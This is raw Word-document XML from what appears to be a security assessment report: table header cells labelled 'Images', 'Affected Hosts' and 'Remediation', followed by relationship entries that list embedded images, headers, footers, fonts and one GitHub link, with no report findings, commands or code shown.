              <w:jc w:val="center"/>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2A3">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4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Images</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">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6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Hosts</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">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8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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sectPr>
      <w:headerReference r:id="rId60" w:type="default"/>
      <w:footerReference r:id="rId61" w:type="default"/>
      <w:footerReference r:id="rId62" w:type="first"/>
      <w:footerReference r:id="rId63"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3">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51.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.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36.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.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52.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/totalrekall/site" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId25"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31.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId58"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4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LibreFranklinMedium-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NotoSansSymbols-bold.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LibreFranklinMedium-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